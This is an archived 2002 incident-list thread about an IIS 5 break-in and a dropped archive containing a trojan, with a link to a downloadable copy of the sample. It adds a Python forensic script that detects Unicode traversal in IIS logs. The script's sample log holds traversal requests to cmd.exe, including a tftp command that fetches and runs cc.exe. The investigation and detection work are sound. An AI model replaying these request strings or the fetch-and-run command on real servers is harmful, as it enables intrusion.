RE: Can anyone identify this backdoor?

From: Erick Arturo Perez Huemer (eperez@compuservice.net)
Date: 07/11/02


From: "Erick Arturo Perez Huemer" <eperez@compuservice.net>
To: "'Matt Andreko'" <mandreko@ori.net>, <incidents@securityfocus.com>
Date: Thu, 11 Jul 2002 00:53:11 -0500

Just to let you know (and the list): the cc.zip has a file named hk.exe.
It has the TROJ.HK.A trojan/virus on it.

Erick A. Perez H.

> -----Original Message-----
> From: Matt Andreko [mailto:mandreko@ori.net]
> Sent: Wednesday, July 10, 2002 04:58 p.m.
> To: incidents@securityfocus.com
> Subject: Can anyone identify this backdoor?
>
> Apparently over the holiday, one of my client's machines was
> broken into. It was running Windows 2000 Pro, with IIS
> installed (webserver only, no FTP, SMTP, etc.). Apparently the
> attacker got in through this. The logs show some Unicode in
> the requests, so I'd bet that's it.
>
> A file was deposited in the c:\winnt\system32\ folder named
> "cc.exe". I have studied it a little bit, and it seems quite
> interesting. It's actually a WinRAR self-executable file.
> Inside it contains what I believe is a stripped-down copy of the
> Serv-U FTP server, messages for that server, and some other
> interesting tools. There's a cmd.exe file which doesn't
> match the size of the one in c:\winnt\system32, so it could
> be backdoored.
>
> I was basically wondering if anyone had seen anything like
> it, or could identify it. I have put a copy up temporarily
> on my webserver at http://www.criminalsmostly.com/~mandreko/cc.zip
>
> ----------------------------------------------------------------------------
> This list is provided by the SecurityFocus ARIS analyzer service.
> For more information on this free incident handling, management
> and tracking system please see: http://aris.securityfocus.com
>
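The "Unicode in the requests" that Matt mentions fits the pattern of the well-known IIS 4/5 Unicode directory-traversal bug (the one patched by MS00-078), in which malformed, overlong UTF-8 encodings of "/" and "\" pass the server's ".." check and then decode to a path separator, letting a request under /scripts/ reach cmd.exe. The Python below is an added example, not code from either poster: it parses constructed IIS W3C extended log lines, decodes the path the way the flawed server did, and pulls out the command line each such request carried, which is how you would confirm the entry vector and see how a file like cc.exe arrived. The sample log, addresses, timestamps and file names are made up for illustration, and the table of encodings is a partial list of the variants seen in the wild, not an exhaustive one.

```python
import re
from urllib.parse import unquote

# Constructed sample of an IIS 5 W3C extended log. None of these lines come
# from the server in the original post; addresses are RFC 5737 test ranges.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 5.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2002-07-04 03:12:07 192.0.2.10 GET /default.htm - 200
2002-07-04 03:12:09 192.0.2.10 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir+c:\\ 200
2002-07-04 03:12:15 192.0.2.10 GET /scripts/..%c1%9c../winnt/system32/cmd.exe /c+tftp+-i+192.0.2.10+GET+cc.exe 200
2002-07-04 03:13:02 192.0.2.10 GET /scripts/..%255c../winnt/system32/cmd.exe /c+cc.exe 200
2002-07-04 03:20:44 198.51.100.7 GET /images/logo.gif - 200
"""

# Partial list (assumption: not exhaustive) of the malformed UTF-8 sequences a
# vulnerable IIS decoded to a path separator after it had checked for "..".
OVERLONG_SLASH = {
    "%c0%af": "/", "%c0%2f": "/", "%e0%80%af": "/",
    "%c1%9c": "\\", "%c1%1c": "\\", "%c1%pc": "\\", "%c0%9v": "\\",
}
OVERLONG_RE = re.compile("|".join(re.escape(k) for k in OVERLONG_SLASH), re.I)


def parse_w3c(text):
    """Yield one dict per data line, keyed by the names in the #Fields: header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        if fields is None:
            raise ValueError("data line before #Fields: header")
        # IIS writes spaces inside a field as '+', so a plain split is safe.
        yield dict(zip(fields, line.split(" ", len(fields) - 1)))


def decode_iis_path(raw_stem):
    """Decode a cs-uri-stem the way the flawed server did: map the overlong
    sequences to the separator they stood for, percent-decode twice (the second
    pass turns %255c into a backslash), then normalise backslashes to '/'."""
    s = OVERLONG_RE.sub(lambda m: OVERLONG_SLASH[m.group(0).lower()], raw_stem)
    s = unquote(unquote(s))
    return s.replace("\\", "/")


def find_traversal(text):
    """Return the requests that used an overlong encoding, or that resolve to a
    '..' traversal ending in cmd.exe, together with the command line they ran."""
    hits = []
    for rec in parse_w3c(text):
        stem = rec.get("cs-uri-stem", "")
        decoded = decode_iis_path(stem)
        overlong = bool(OVERLONG_RE.search(stem))
        cmd_traversal = "/../" in decoded and decoded.lower().endswith("cmd.exe")
        if overlong or cmd_traversal:
            query = rec.get("cs-uri-query", "-")
            command = unquote(query.replace("+", " ")) if query != "-" else ""
            hits.append({
                "ip": rec["c-ip"], "time": rec["date"] + " " + rec["time"],
                "stem": stem, "decoded": decoded, "command": command,
                "status": rec["sc-status"],
            })
    return hits


if __name__ == "__main__":
    for h in find_traversal(SAMPLE_LOG):
        print(f"{h['time']} {h['ip']} {h['status']} {h['decoded']} :: {h['command']}")
```

Run against a real ex*.log from the compromised host, the decoded command column is what tells you whether the attacker only listed directories or also fetched and launched a payload (the constructed tftp line above shows the second case). For the cmd.exe inside the archive, compare it with a known-good copy from the Windows 2000 media by hash rather than by size, since a size difference alone also fits a different service-pack build.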